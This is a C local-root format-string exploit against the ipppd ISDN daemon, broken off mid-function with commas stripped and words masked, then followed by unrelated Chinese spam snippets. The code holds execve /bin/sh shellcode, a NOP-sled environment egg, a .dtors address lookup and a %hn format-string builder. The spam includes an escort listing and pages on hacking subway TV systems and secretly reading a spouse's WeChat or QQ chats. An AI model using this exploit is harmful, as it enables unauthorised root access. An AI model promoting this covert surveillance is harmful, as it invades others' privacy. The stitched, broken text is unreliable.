/ #include #include #include #include #define ADD 0x100 #define OCT( b0 b1 b2 b3 addr ) { \ b0 = (addr >> 24) & 0xff; \ b1 = (addr >> 16) & 0xff; \ b2 = (addr >> 8) & 0xff; \ b3 = (addr ) & 0xff; \ } #define DTORS "/usr/bin/objdump -s -j .dtors /usr/ *** in/ipppd | /usr/bin/cut -c 2-9 |/usr/bin/awk NR==5" #define IPPPD "/usr/ *** in/ipppd" #define OFFSET 11 #define BASE 5 #define DEF_EGGSIZE 500 #define DEF_ALIGN 4 char vitamin[300]; char DtorsAddr[36]; unsigned long get_sp(void) { __a *** __ ("movl %esp %eax"); } char nop[] = { 0x90 }; static char shellcode[] = //ptrace24.c shellcode "\x6a\x17\x58\x31\xdb\xcd\x80\x31" "\xd2\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\x8d\x42\x0b\xcd\x80"; int i=0; char *pointer; char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; int find(){ /*Thanks to GOBBLES for the find() code*/ pointer = (char *)get_sp(); while((i = strncmp(pointer nops strlen(nops))) != 0) pointer++; if(i == 0) { pointer=pointer+1; return pointer; } else { fprintf(stderr "Sorry nimm GDB\n"); return; } } char * grepit() { //from the Mixter md5bd.c backdoor FILE *p; char fmt[1024]; snprintf(fmt 1024 DTORS); p = popen(fmt "r"); memset(DtorsAddr 0 36); fread(DtorsAddr 32 1 p); fclose(p); return DtorsAddr; } char * build_hn( unsigned int retaddr unsigned int offset unsigned int base ) { // From the fmtbuilder.c unsigned int length; unsigned int high low; char * buf; int start = ((base / (ADD*ADD)) + 1)*ADD*ADD; high = ( retaddr & 0xffff0000 ) >> 16; low = retaddr & 0x0000ffff; length = ( sizeof( offset ) * 2 ) + sizeof( high ) + sizeof( low ) + 15; if ( !(buf = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr "Can't allocate buffer (%d)\n" length ); exit( -1 ); } memset( buf 0 length ); snprintf( buf length "%%.%hdx%%%d$n%%.%hdx%%%d$hn" low - ( sizeof( size_t ) * 2 ) + start - base offset high - low + start offset+1 ); return buf; } void soso(void) { printf ( "\t\t***yet another lame ipppd local root formatstring exploit***\n\n"); printf ( "**usage:\n\n exploitipppd -s start the eggshell -e !ExploRe iT! [-d .dtors section -o offset -b base]\n\n"); } void egg() { char *eggbuf *buf_ptr; int align i eggsize ; align = DEF_ALIGN; eggsize = DEF_EGGSIZE ; if ( (eggbuf = malloc( eggsize )) == NULL ) { printf ("error : malloc \n"); exit (-1); } /* set egg buf */ memset( eggbuf (int)NULL eggsize ); for ( i = 0; i < 250 ; i++ ) strcat ( eggbuf nop ); strcat ( eggbuf shellcode ); for ( i =0 ; i < align ; i++ ) strcat ( eggbuf "A"); memcpy ( eggbuf "S=" 2 ); putenv ( eggbuf ); fprintf(stderr "\nUse ./exploitipppd -e to explore ipppd now\n\n"); system("/bin/sh"); } int main( int argc char **argv[] ) { char opt; char * fmt; char * endian; unsigned long locaddr retaddr; unsigned int offset base align = 0; unsigned char b0 b1 b2 b3; int length ch; int t=0 u=0; if(argc < 2) { soso(); exit(1); } length = ( sizeof( size_t ) * 16 ) + 1; if ( !(endian = (char *)malloc(length * sizeof(char))) ) { fprintf( stderr "Can't allocate buffer (%d)\n" length ); exit( -1 ); } memset( endian 0 length ); offset = OFFS
长期玩手机?生活压力大?雾霾严重?眼部彩妆?经常熬夜?一大波毒素正在“侵蚀”你的双眼!阿果六胜肽眼霜针对眼部问题,赋活眼周肌肤,改善眼袋和黑眼圈,调动眼部的活性循环,调理松弛、下垂现象,减少眼部水肿及...
本文导读目录: 1、《黑客帝国》中,Smith为何复活? 2、如何入侵地铁所有的电视播放系统呢? 3、大街上经常遇到有人给你微信转账换现金,为什么一定不能换?有什么骗局吗? 4、别人用手机...
“北京市伴游预定花费-【严嘉】” 这名亲妹妹现在是我国传媒大学的在学本科毕业生哦。还在学大学本科的她相貌清纯可爱,涉及到語言:家乡话,普通话水平年纪:十九岁伴游時间:周一至周五有时间身材:梨型 ID...
. 宝宝出生后什么东西都要换成宝宝专用的,就连给宝宝穿的衣服也要超级舒服的,不过宝宝穿的衣服是容易弄脏的,刚穿好的衣服,宝宝就会在地上爬来爬去,或者吃东西的时候漏在衣服上面,那么用什么洗衣液好呢,友...
有什么可以监控微信聊天记录(怎样监视对方的微信聊天记录)央行在今年7月出了一个新政策,即将在2019年的1月1日起实施。 个人单天交易5万,转账20万以上,将受央行可疑监控。 也就是说,个人使用支...
在电脑可以破解我老公的微信聊天记录吗怎么偷看别人的QQ聊天记录淘宝网旅游是很多人的理想 ,但唯一的差别是時间和钱财。殊不知,有些人说没有时间和钱财是懒散的托词 。假如你确实想干,也有時间去挤 ,钱是能...